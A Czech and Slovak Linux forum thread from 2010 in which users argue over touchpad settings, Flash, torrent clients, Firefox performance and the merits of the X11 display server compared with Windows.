    Nebo ty snad si každej den otvířáš ten nastavovací dialog a dlouhé hodiny šteluješ touchpad? To asi ne. Obvykle člověk koupí notebook, nainstaluje systém, nastaví touchpad a jede. Maximálně jednou za půl roku udělá nějakou menší úpravu.
    Z tohohle hlediska je textové nastavení často praktičtější, protože tám máš ty číselný hodnoty všechny pěkně pohromadě a vidíš jejich skutečnou hodnotu. V klikacím dialogu máš obvykle jakýsi grafický prvek nejisté povahy a je to celé rozděleno do X tabů...

    Navíc je takové nastavení nepřenosné, jedinný způsob, jak si to přenýst (např. na nový systém) je udělat si screenshot :-D
    Fluttershy, yay! avatar 29.8.2010 12:41 Fluttershy, yay! | skóre: 92 | blog:
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    .kde/share/config/kcmtouchpadrc
    🇵🇸Touch grass🇺🇦 ✊ no gods, no masters
    29.8.2010 23:51 kralyk z abclinuxu | skóre: 29 | blog:
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Jj, jasný, já měl na mysli hlavně ty windowsí utility...
    30.8.2010 01:25 Knowtorious
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Z tohohle hlediska je textové nastavení často praktičtější, protože tám máš ty číselný hodnoty všechny pěkně pohromadě a vidíš jejich skutečnou hodnotu. V klikacím dialogu máš obvykle jakýsi grafický prvek nejisté povahy a je to celé rozděleno do X tabů...
    Ja nerikam ze ne, ale takto BFU nefunguje. Osobne sam nevim, jak si mam nastavit napr. obnovovaci frekvenci monitoru, kdyz na me vybafne manualni vyber. Sam bych v tomto pripade "zaruceny textak" asi ocenil ze vseho nejvic, ale BFU ani nebude vedet co s nim...

    Proto radeji BFU zvoli napr. u Mouse Motion pofiderni hodnotu 4 z 10ti, klikne na Pouzit a rovnou odzkousi. Pokud no good, tak zvoli hodnotu jinou. Coz vlastne ja presne delam ve 3D FPS-kach. Nebo snad pouzivas .conf textak i na tohle? (Hint: OS neni pro bezne lidi modla ale pouhy zavadec ruznych hovadin.)
    27.8.2010 10:24 R
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Linuxova verzia Firefoxu je otrasna, to potvrdi kazdy, co nie je uplne slepy.

    Ze X server je na desktop nevhodny, to je fakt. Vzdy to bolo oproti Windows pomale - pamatam si to od cias Monkey Linux vs. Windows 95.
    27.8.2010 10:41 Martin Mareš
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Linuxova verzia Firefoxu je otrasna, to potvrdi kazdy, co nie je uplne slepy.
    Zcela souhlasím. Jen je to důsledek obecnějšího pozorování, totiž že Firefox je otřesný sám o sobě :-)
    Ze X server je na desktop nevhodny, to je fakt.
    Ne, to není fakt. To je tvrzení bez jediného náznaku důkazu. Tak řečené plácání.
    27.8.2010 12:16 Ondrej 'SanTiago' Zajicek
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Zrovna u X serveru by se tech argumentu asi nasla hromada - tak napriklad procesorovy cas straveny vykreslovanim je uctovan X serveru a ne procesu, ktery je za nej skutecne odpovedny (prislusny X klient). To narusuje scheduling, znemoznuje (nebo znacne komplikuje) rozumne ridit pridelovani casu procesum pomoci priorit.

    Standardni kreslici funkce X jsou v mnoha ohledech padle na hlavu (napr. kresleni pixmap s jednobitovou pruhlednosti se dela znacne krkolomne a je o rad pomalejsi nez kresleni nepruhlednych pixmap). Tohle sice zlepsil X render extension, ale tam to zas rozbijeji pomale knihovny (Cairo). Takze v konecnem dusledku zatim asi nejlepe funguji ty programy, ktere i na 2D grafiku pouzivaji OpenGL.

    Zmatek, ktery panuje ve fontech a jejich renderovani, radsi ani nebudu komentovat.
    27.8.2010 12:24 kralyk z abclinuxu | skóre: 29 | blog:
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Mně vadí chybějící pořádná dokumentace XCB...
    Něco jako okomentovaných pár hlavních funkcí +2 tutoriály, sorry, ale to není dokumentace.
    27.8.2010 12:42 Martin Mareš
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Zrovna u X serveru by se tech argumentu asi nasla hromada - tak napriklad procesorovy cas straveny vykreslovanim je uctovan X serveru a ne procesu, ktery je za nej skutecne odpovedny (prislusny X klient).
    To ovšem předpokládá, že se dá nějakým rozumným způsobem nadefinovat, který proces je za operaci odpovědný. Pokud se překresluje obsah okna proto, že z něj někdo odsunul jiné okno, není za operaci odpovědný ten proces, který ono jiné okno odsunul? Nedávalo by naopak smysl, aby účtování času řešil X server, který jako jediný rozumí sémantice operací?
    Standardni kreslici funkce X jsou v mnoha ohledech padle na hlavu
    Jasně – ale to jsou přeci obecné problémy X serveru (respektive spíš protokolu než serveru), které nejsou nijak specifické pro použití na desktopu.

    A jak všichni rádi na X Window System nadávají, ještě se bohužel nenašel nikdo, kdo by přišel s něčím lepším, což je škoda (IMHO ani ve windowsovém světě).
    27.8.2010 13:18 Ondrej 'SanTiago' Zajicek
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    To ovšem předpokládá, že se dá nějakým rozumným způsobem nadefinovat, který proces je za operaci odpovědný. Pokud se překresluje obsah okna proto, že z něj někdo odsunul jiné okno, není za operaci odpovědný ten proces, který ono jiné okno odsunul?
    Zrovna v tomhle bych problem nevidel. Za kreslici operaci je proste odpovedny ten, kdo ji iniciuje. Okna se obvykle neposouvaj sami od sebe. Pokud se prekresluje obsah okna proto, ze z nej nekdo odsunul jine okno, tak na to lze nahlizet tak, ze odkrytim uzivatel pozadal program o to, aby se prekreslil. Hypoteticky priklad okna samovolne se hejbajiciho po plose aby aktivivalo prekreslovaci rutiny ostatnich programu asi muzeme zanedbat. Osobne si myslim, ze muzeme zanedbat jakekoliv prekreslovani aktivivane zmenou rozlozeni oken - to bude minimum proti prekreslovani programu pri praci s nima.
    Nedávalo by naopak smysl, aby účtování času řešil X server, který jako jediný rozumí sémantice operací?

    Myslis, ze je prakticky mozne to udelat lepe, nez na zaklade spotrebovaneho casu CPU/GPU? Ze jine reseni nebude znacne komplikovane? Nehlede na to, ze uctovani a scheduling v X serveru znacne znesnadnuje integraci se souvisejicimi jadernymi zalezitostma jako cgroups.
    Jasně – ale to jsou přeci obecné problémy X serveru (respektive spíš protokolu než serveru), které nejsou nijak specifické pro použití na desktopu.

    Ona taky veta 'X server je nevhodny pro desktop' je jen instanci obecnejsi 'X server je nevhodny'. ;–)
    27.8.2010 17:24 Martin Mareš
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Myslis, ze je prakticky mozne to udelat lepe, nez na zaklade spotrebovaneho casu CPU/GPU? Ze jine reseni nebude znacne komplikovane?
    Po pravdě řečeno, zatím nejsem ani přesvědčen, že problém existuje, takže nevím, jak by mohlo vypadat jeho správné řešení :-)

    Ale vidím, že čím složitější desktop zkoušíme postavit, tím je hůř definované, která aplikace kterou operaci vyvolala (lepší příklad než mé posouvání oken je kompozice obrazu z více transparentních oken), takže zakládat scheduling na tom, že se operace provede v kontextu nějakého procesu, nemusí být vždycky správně.

    Tohle ovšem není problém specifický pro grafiku a uživatelské rozhraní – v nějaké podobě existuje, kdykoliv jeden program využívá služeb programů jiných, což je v dnešní době čím dál tím běžnější...
    27.8.2010 18:07 Ondrej 'SanTiago' Zajicek
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Po pravdě řečeno, zatím nejsem ani přesvědčen, že problém existuje, takže nevím, jak by mohlo vypadat jeho správné řešení

    Pozadavek na to, aby dva (ci vic) bezicich procesu dostavalo umerne mnozstvi systemovych zdroju je vcelku prirozeny. Pokud budu mit pusteny program neumerne vytezujici grafiku, tak ocekavam, ze by melo byt mozne bez potizi a bez vyznamneho zpomaleni (rekneme pomerneho) pouzivat ostatni programy, pripadne pouzit nejaky nice-like mechanismus pro vyraznejsi omezeni takoveho procesu.

    Neni neobvykle, ze program spotrebovava srovnatelne mnozstvi procesoroveho casu jak primo, tak zprostredkovane pres X server.
    Tohle ovšem není problém specifický pro grafiku a uživatelské rozhraní – v nějaké podobě existuje, kdykoliv jeden program využívá služeb programů jiných, což je v dnešní době čím dál tím běžnější..
    To je pravda, ale myslim, ze zrovna X server vsechny ostatni takove pripady majorizuje.
    27.8.2010 23:24 Martin Mareš
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Pozadavek na to, aby dva (ci vic) bezicich procesu dostavalo umerne mnozstvi systemovych zdroju je vcelku prirozeny.
    A nedává pak smysl prohlásit výkon X serveru za jeden ze systémových zdrojů a nechat X server, ať tento prostředek nějakým rozumným způsobem rozděluje aplikacím? (Tím budu vyrovnávat nejen procesorový čas, ale také vytížení grafické karty, což může být v dnešní době důležitější.)
    27.8.2010 23:41 Ondrej 'SanTiago' Zajicek
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    A nedává pak smysl prohlásit výkon X serveru za jeden ze systémových zdrojů a nechat X server, ať tento prostředek nějakým rozumným způsobem rozděluje aplikacím?
    Jenze ten zdroj je jen obal nad skutecnym zdrojem - casem CPU a casem GPU. Kdyz budes mit scheduling na X serveru, tak mas problem s tim, ze ti budou pretahovat CPU-zrave aplikace s graficky-zravyma aplikacema o CPU. Pokud reknes ze pro systemovy scheduler je X server normalni proces jako kazdy jiny, pak ti mnoho CPU-zravych uloh omezi graficke aplikace, pokud naopak reknes, ze X server ma vysokou prioritu, tak ti jedna graficky-zrava aplikace omezi CPU-zrave aplikace. A co se tyce casu GPU, tak staci pustit OpenGL aplikaci vyuzivajici DRI a X server toho moc neuscheduluje.

    Proto me prijde rozumnejsi cesta schedulovat ty veci na urovni jadra a u casu CPU dohromady s ostatnimi uzivateli CPU.
    27.8.2010 23:51 Martin Mareš
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Proto me prijde rozumnejsi cesta schedulovat ty veci na urovni jadra
    OK -- a máš nápad, jak to udělat? :-)
    28.8.2010 00:36 Ondrej 'SanTiago' Zajicek
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Coz o to, napady by byly, horsi je to s realizaci. :–)

    Vyradit ze samotneho renderovani X server, implementovat X lib, ktery pro renderovaci funkce bude lokalne pouzivat DRI (pri remote X se proste na stroji s X serverem spusti proxy proces, ktery bude lokalne renderovat pres DRI podle pokynu X protokolem). Scheduling pak udelat na urovni rozhrani DRI.
    28.8.2010 13:00 Martin Mareš
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    To by bylo fajn :-)

    Jen zatím vůbec nemám jasno v tom, jak od sebe aplikace alespoň trochu izolovat, což dnešní Xka dělají docela dobře a často se to hodí. Ale natolik do DRI ještě nevidím, abych uměl říci, jaká izolace se do něj dá dodělat.
    27.8.2010 11:59 Michal Kubeček | skóre: 72 | Luštěnice
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Linuxova verzia Firefoxu je otrasna, to potvrdi kazdy, co nie je uplne slepy.

    Jak mi tedy vysvětlíte, že dokážu přečíst váš příspěvek?

    Ze X server je na desktop nevhodny, to je fakt.

    Fakt je nanejvýš to, že vy máte takový názor.

    27.8.2010 13:35 R
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Tak potom asi mas 6-jadrove Core i7, 32GB RAM a home namontovany cez fibre channel z diskoveho pola. A neporovnaval si to na rovnakom HW s Windows...
    27.8.2010 13:42 kralyk z abclinuxu | skóre: 29 | blog:
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Já mám trapný Pentium Dual-Core 2GHz, 2GB RAM, notebook, a FF jede standardní rychlostí. Tzn. pomalu, ale snesitelně a na woknech by to nebylo lepší... V paměti má 270MB, ovetřeno mám asi 30 tabů včetně Jílek-flejmu s 1000+ komentáři...
    27.8.2010 13:58 R
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Tak si to v tych Windows vyskusaj a uvidis.
    Jakub Lucký avatar 27.8.2010 15:22 Jakub Lucký | skóre: 40 | Praha
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Já se teda nesetkávám s rozdílem...
    If you understand, things are just as they are; if you do not understand, things are just as they are.
    default avatar 27.8.2010 10:53 default | skóre: 22 | Madrid
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Hele. Nic si z toho nedělej. Moje kolečko je taky hranatý, ale když si ho představíš kulatý, tak tolik nedrncá. :-D
    27.8.2010 11:04 Ladicek | skóre: 28 | blog: variace | Havlíčkův brod
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Moje kolečko je taky hranatý
    Nevzpomínám si, že bych tě tu někdy viděl nadávat na masox. Všechno je jednou poprvé? :-)
    Ještě na tom nejsem tak špatně, abych četl Viewegha.
    default avatar 27.8.2010 11:08 default | skóre: 22 | Madrid
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    OS X je software jako kterýkoli jiný. A to se vším všudy. Tedy i s chybami. :-D
    27.8.2010 12:06 Vskutečnosti Saýc | skóre: 7
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)

    OS X nema tiling WM. OS X tedy saje. Q.E.D.

    :-D

    Vykook avatar 27.8.2010 17:09 Vykook | skóre: 23 | blog: Tomas
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Samozrejme ze ma.
    Nejde nám o dobro druhých. Nejde nám o bohatství. Jde o čisté opojení mocí.
    27.8.2010 11:23 kralyk z abclinuxu | skóre: 29 | blog:
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    utorrent jede ve wine ;-)
    27.8.2010 11:29 kotrcka | skóre: 23 | blog: Onééé 2 | Praha
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    to je samozrejme mozne. ale problem s flashom mi to asi nevyriesi, vsak? :-)

    okrem toho, nedotiahnutost aplikacii je vseobecna, torrent bol len priklad.
    Keďže tu účet nejde zrušiť, zmenil som si heslo na random a "zabudol ho".
    27.8.2010 11:38 Ondrej 'SanTiago' Zajicek
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    problem s flashom mi to asi nevyriesi, vsak?

    Problem s flashem se nejlepe vyresi tim, ze se zadny flashovy plugin nenainstaluje.
    27.8.2010 13:40 R
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Presne takto som vyriesil nefunkcnost noveho flashu v Konquerore 3.5.10...
    27.8.2010 11:45 kralyk z abclinuxu | skóre: 29 | blog:
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Jen jsem řek, že utorrent jede ve wine, nic víc, nic míň.
    Jestli se ti ta informace nelíbí, můžeš si ji vytisknout a utřít si tím to... tento... :-D
    27.8.2010 11:55 kotrcka | skóre: 23 | blog: Onééé 2 | Praha
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    ja som sa len pre istotu spytal, ci to nahodou nie je univerzalne riesenie vsetkych problemov :-D

    a dakujem za radu, v tescu mali akciu na vonavy, trojvrstvovy, s obrazkami kvetov.
    Keďže tu účet nejde zrušiť, zmenil som si heslo na random a "zabudol ho".
    27.8.2010 18:15 abr
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Flash jede ve wine taky :)
    AsciiWolf avatar 27.8.2010 21:29 AsciiWolf | skóre: 40 | blog: Blog
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    I Firefox. ;-)
    mirec avatar 27.8.2010 12:00 mirec | skóre: 32 | blog: mirecove_dristy | Poprad
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Touchpad - na kliknutie má väčšiu citlivosť ako v Linuxe.

    Prečo by v linuxe nemohol mať menšiu citlivosť? Osobne by som napr. privítal aby touchpad reagoval na kladivo, alebo iné podobné polohovacie zariadenie. Ešte, že starý book s touchpadom už nemám a na novom žiaden touchpad nie je.

    LinuxOS.sk | USE="-fotak -zbytocnosti -farebne_lcd +vydrz +odolnost +java" emerge telefon
    27.8.2010 12:56 Semo | skóre: 45 | blog: Semo
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    synclient
    If you hold a Unix shell up to your ear, you can you hear the C.
    mirec avatar 27.8.2010 17:59 mirec | skóre: 32 | blog: mirecove_dristy | Poprad
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Poznám, mal som z neho poriadne nervy. Chcem zväčšiť okno, držím alt a prd, nereaguje touchpad :D A aj tak sa mi občas stávalo, že počas písania som tam omylom klikol. Jediné ako-tak spoľahlivé riešenie je zrušiť klikanie, ale najlepšie sa mi osvedčilo nemať touchpad ;)
    LinuxOS.sk | USE="-fotak -zbytocnosti -farebne_lcd +vydrz +odolnost +java" emerge telefon
    28.8.2010 15:38 Semo | skóre: 45 | blog: Semo
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Ha, syndaemon, nie synclient
    syndaemon -t -k -d -i 2
    -k     Ignore modifier keys when monitoring keyboard activity.
    -t     Only disable tapping and scrolling, not mouse movements,
           in response to keyboard activity.
    
    Prip. -i 1
    If you hold a Unix shell up to your ear, you can you hear the C.
    27.8.2010 12:44 frdrx | skóre: 29 | blog: frdrx
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Vždyť to říkám furt, lidi si stěžujou na čím dál větší kraviny -- spolehlivá indikace, že jsou distribuce stále lepší a lepší.
    Patička mi slouží k tomu, abych si lépe poznal svoje příspěvky.
    Amarok avatar 30.8.2010 14:39 Amarok | skóre: 33 | blog: blogoblog
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    +1
    GNUniverse - May the source be with you...
    =^..^= AmigaPower® avatar 27.8.2010 12:57 =^..^= AmigaPower® | skóre: 30 | blog: BLB | Praha
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Ani s jednim bodem nemůžu souhlasit, ba vidím to dokonce přesně obráceně (zvlášť bod 1), co se týče posledního bodu, problémů jsem si nevšim, ale po torrentu jsem něco kradl naposled někdy ve 2007. Souhlas s tim, že nejlepší léta Linuxu na desktopu byly okolo 2007
    kotyz avatar 27.8.2010 13:08 kotyz | skóre: 25 | blog: kotyzblog | Radnice
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    ty nestahujes novy verze mandrivy z torrentu? ;-) btw, na kradeni je stejne vetsinou lepsi rapidshare ;-)
    Mul-ti-pass! | Hrdý člen KERNEL ULTRAS. | Furry/Brony/Otaku | Nemám čas ztrácet čas. | In 'pacman -Syu' we trust!
    kotyz avatar 27.8.2010 13:10 kotyz | skóre: 25 | blog: kotyzblog | Radnice
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    kradeni melo bejt v uvozovkach, protoze to je zatim pri splneni nekolika podminek legal (a zrovna ty torrenty na to moc napasovat nejdou) ...
    Mul-ti-pass! | Hrdý člen KERNEL ULTRAS. | Furry/Brony/Otaku | Nemám čas ztrácet čas. | In 'pacman -Syu' we trust!
    =^..^= AmigaPower® avatar 27.8.2010 13:53 =^..^= AmigaPower® | skóre: 30 | blog: BLB | Praha
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    nestahuju, táhnu jí z ftp. ;-)
    Ruža Becelin avatar 27.8.2010 14:47 Ruža Becelin | skóre: 40 | blog: RuzaBecelinBlog
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    ale po torrentu jsem něco kradl naposled někdy ve 2007

    Super veta, doufam, zes to nemyslel vazne, protoze jinak to je na odstrel :-)

    Ja stahuju pres torrent vsechno, co jde, hlavne DVD Linuxovych distribuci. Vsechno legalne, na warezeni nemam naladu - pokud projde zakaz torrentu, tak me to nastve :-(

    U torrentu mam lepsi pocit, ze nepretezuju linku (HTTP je podle me urcene na prohlizeni webu a ne stahovani megasouboru), navic na HTTP/FTP byvaji limity na spojeni/rychlost, takze ve vysledku mi jede torrent rychleji :-)
    Jakub Lucký avatar 27.8.2010 15:28 Jakub Lucký | skóre: 40 | Praha
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    1) Man synclient

    2) Co to má co společného s Windows?

    3) Tenhle rozdíl teda nepoznávám

    4) 30 klientů je ti málo? Mimochodem, třeba deluge funguje výborně
    If you understand, things are just as they are; if you do not understand, things are just as they are.
    otasomil avatar 27.8.2010 15:53 otasomil | skóre: 39 | blog: puppylinux
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)

    Touchpad - no nevim pokazdy to slo nekde nastavit - ja s tim nikdy nerejpal, ve windows tak jak v jakekoli distribuci.

    Flash - nepamatuji ze by nekdy shodil prohlizec ci co a to na zadne z rozebiranych platforem. Pokud nepotrebuji sledovat nejaka videa tak jej mam zakazany kvuli reklamam.

    Klienti site torrent - nevim nepoznal jsem jakekoli rozdily mezi klientama ani mezi OS na nichz bezi. Je-li dostatek uzivatelu sdilejicich napr nejakou distribuci tak to vali co da linka - zde nema cenu zkouset windows a ani jine klienty.

    Lenivost aplikaci ... vite o tom ze windows vista i seven "predcitaji" v prubehu startu aplikace jez uzivatel pouziva nejcasteji ? Pokud si toto vypnete v msconfigu tak bude rovnaky Firefox stejne "lenivy" i ve windows. A totez i ostatni aplikace jez pouzivate.

     

    Zaverem .... nejlepsi je takovy system o kterem nevim a nemusim se o nej starat ... a toto windows prave nejsou pac neustale bobtnaji a zpomaluji se coz obnasi obsacne obnoveni kompletniho systemu ze zaloh, ktere je potreba prubezne tvorit.

    Pokud toto clovek dela tak je i windows pomerne velmi dobre pouzitelny system stale rychly, bezpecny a cisty.

     

    Je to neco jako motorkari a automobilisti. Automobilisti (windows) maji stovky argumentu ze je masina na ho**o a jejich auto je nejlepsi v kazde situaci avsak zapominaji ze motorkari (GNU/Linux) chcou byt motorkarema (Linuxarema) proto protoze je to bavi.

    Totez pejskari a kockari. Pejskaru je mnohem vic oproti kockarum (psa ma kdejaky moula jez ma sotva na to aby ho uzivil) a pritom oboji jsou domaci mazlicci. Pejskari rikaji jak je kocka na h***o ze nehlida, kurvi potahy na sedacce .....

    Na pejskare se nadava ze je po ulicich nasr**y .....

     

    Holt ve vsem je nejake + a -

     

    K čemu hudba, která nevede k extázi... Stop MDMA !!! I spam umí být roztomilý
    27.8.2010 17:06 kotrcka | skóre: 23 | blog: Onééé 2 | Praha
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    ani nevravim, ze zhadzuje prehliadac. to sa dialo pred 2-3 rokmi (okolo flashu 9). spadne len plugin, staci refreshnut web.ale je to otravne, lebo to samozrejme zhodi flash v kazdom tabe (teda ak sa mi vedla nacitava youtube video, tak smola).
    Keďže tu účet nejde zrušiť, zmenil som si heslo na random a "zabudol ho".
    27.8.2010 23:18 J. M. | skóre: 23 | blog: JMblog
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Lenivost aplikaci ... vite o tom ze windows vista i seven "predcitaji" v prubehu startu aplikace jez uzivatel pouziva nejcasteji ? Pokud si toto vypnete v msconfigu tak bude rovnaky Firefox stejne "lenivy" i ve windows. A totez i ostatni aplikace jez pouzivate.
    Mě udivuje, že v roce 2010, a navíc na linuxovém serveru, ještě pořád existuje někdo, kdo si myslí, že rychlost softwarového produktu rovná se rychlost jeho startu, a vůbec si nedokáže představit, že by se rychlost mohla týkat jakéhokoli jiného aspektu než této jedné bezvýznamné prkotiny. O které navíc autor tohoto blogového zápisku vůbec nepsal.

    Jinak to je samozřejmě naprostá pitomost. Firefox ve Windows není stejně lenivý jako na Linuxu prostě z toho důvodu, že jeho GUI se na Windows vykresluje několikanásobně rychleji než na Linuxu (protože na Linuxu visí na celé té pomalé vykreslovací infrastruktuře pod tím). To je velmi dobře známý fakt, který je platný celou dobu, od kdy Mozilla zavedla XUL. Já si tu dobu před 10 lety dobře pamatuji. Tehdy, na nějakém Pentiu 133 MHz, bylo GUI Mozilly líné i na Windows, ale dalo se ještě používat, ale na stejném stroji na Linuxu to prostě nebylo použitelné skoro vůbec, tam prostě člověk kliknul třeba na nabídku a pak čekal několik sekund, než se postupně vykreslí na obrazovku. No od té doby se počítače mnohonásobně zrychlily, takže postupem času začalo být XUL „jen“ líné, ale použitelné i na Linuxu, ale ten rychlostní rozdíl nikdy nezmizel, ten je celých těch 10 let dobře pozorovatelný a měřitelný na každém počítači, na kterém jsem za těch 10 let měl čest Mozillu vyzkoušet. Kdo říká, že to nepozoruje, sám si odpovídá – nepozoruje, tudíž nevidí. Kdo pozoruje, vidí. Např. na mém 3GHz dvoujádru dodnes na Linuxu vidím, jak se třeba dialogu pro uložení sezení ve Firefoxu (který sestává z textu o jedné větě a tří tlačítek) nechce se ukázat. Chvíli nic, pauza, potom se objeví kostra dialogu, potom se postupně zleva doprava vykreslí... Samozřejmě na Windows je celý dialog okamžitě na obrazovce v momentě kliknutí myší. A takových věci jsou tisíce.

    A samozřejmě se to týká GUI obecně. Spousta aplikací má prostě daleko rychlejší grafiku a nižší režii GUI (několikanásobně nižší vytížení procesoru) pod Windows. Vykreslování pod Windows je prostě daleko rychlejší a efektivnější než na jiných systémech, což celé dlouhé roky bez jediné výjimky potvrzují i všechny benchmarky 2D grafiky, které kdy byly provedeny. Je to několikanásobný rozdíl, někdy dokonce i v řádech tisíců procent.

    Určitou šancí do budoucna jsou jen projekty, které co nejvíc obcházejí pomalé X.org, a tím grafiku výrazně urychlují. Jako cairo-drm, které, ač zatím experimentální, tak oproti standardnímu Cairu, které nepoužívá přímé vykreslování a kreslí přes X.org, nabízí na grafických kartách Intel 250x rychlejší kreslení gradientů, 50x rychlejší vykreslování u různých operací a 4x rychlejší kreslení textu. To už je úroveň, která se konečně, poprvé v historii, bude dát srovnávat s Windows. A mimo jiné i dokazuje, že X11 je skutečně tak beznadějně shnilé a grafiku zpomalující, jak se o něm desítky let traduje.
    27.8.2010 23:27 J. M. | skóre: 23 | blog: JMblog
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    (A co se týče druhého tábora hlavních toolkitů, tak vývojáři Qt už nad X11 zlomili hůl dávno. Všechny jejich výkonnostní optimalizace letos už se týkají jen backendu raster, případně OpenGL. Oba obcházejí vykreslování přes X.org, raster si to vykresluje softwarově sám a X.org pošle jen výsledek. Nativní X11 backend, používající XRender, už přestali vylepšovat, protože to se evidentně prostě nedá. Jediná cesta k rychlé grafice pod X11 je nepoužívat X11, respektive jej používat jen jako blbý hlásič souřadnic kurzoru myši.)
    27.8.2010 23:28 Martin Mareš
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Na X11 všichni rádi nadávají, ale málokdo se pustí do opravdového profilování, aby se přesvědčil, že ho zpomaluje opravdu X11.

    Protipříkladem na Vaši teorii je například Google Chrome, který i na X11 vše vykresluje bez viditelné prodlevy. To by podle Vás nemělo jít, ne? :-)

    To, že je Mozilla bumbrlíček schopný sežrat libovolné množství výpočetního výkonu, je jaksi fakt nezávislý na X11. (Mimochodem, nepoužívá na Windows systémový dialog na výběr souboru, zatímco na Linuxu svůj vlastní XULový?)
    27.8.2010 23:40 J. M. | skóre: 23 | blog: JMblog
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Protipříkladem na Vaši teorii je například Google Chrome, který i na X11 vše vykresluje bez viditelné prodlevy. To by podle Vás nemělo jít, ne? :-)
    Linuxové Chromium má na mém počítači měřitelně 2x-3x pomalejší, CPU vytěžující scrollování než jakýkoli jiný prohlížeč. A i nezávislý benchmark, který jsem viděl, ukazuje, že linuxová verze má rolování 3x pomalejší než na Windows. Klasika.
    (Mimochodem, nepoužívá na Windows systémový dialog na výběr souboru, zatímco na Linuxu svůj vlastní XULový?)
    Jednak jsem nepsal o dialogu pro výběr souboru, jednak dialog pro výběr souboru je speciální případ, kdy Firefox používá systémový dialog platformy – na Windows nativní Windows dialog, na Linuxu nativní GTK+ dialog (který je mimochodem taky několikanásobně pomalejší než ten od Microsoftu). Čili tam na to Firefox nemá vliv. Ale o tom jsem nepsal.
    27.8.2010 23:48 Martin Mareš
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    A i nezávislý benchmark, který jsem viděl
    [citation needed]

    Velmi by mne zajímalo, jak se takové věci, jako odezva UI dají solidně měřit a jestli to už někdo doopravdy dělá, nebo jestli je to jen další dojmologie.
    28.8.2010 00:14 J. M. | skóre: 23 | blog: JMblog
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Jestli se nepletu, tak to byl tento test:

    http://sliste.sl.funpic.de/bmark/

    Mimochodem, skoro všichni, kteří ho zkoušeli, svorně hlásili, že Chrome je suverénně nejpomalejší. Samozřejmě takové věci ovlivňují různé proměnné jako grafická karta, ovladač, zapnutý/vypnutý kompozitor, ale asi to nebude náhoda. I na maling listu Chrome jsem viděl stížnosti na pomalé rolování. Je to vidět i pouhým okem. Když jsem zkoušel linuxové Chromium na 2,4GHz jednojádru, tak to bylo prostě nepoužitelné, protože rolovat dokumentem prostě rozumně nešlo, jak to bylo pomalé, jak strašně to sekalo a lagovalo, jak říká Jardík. Teď na 3GHz dvoujádru to tak tak stačí, vytížení se blíží stovce, ale většinou ji nedosahuje, takže to tedy ještě nějak utáhne.

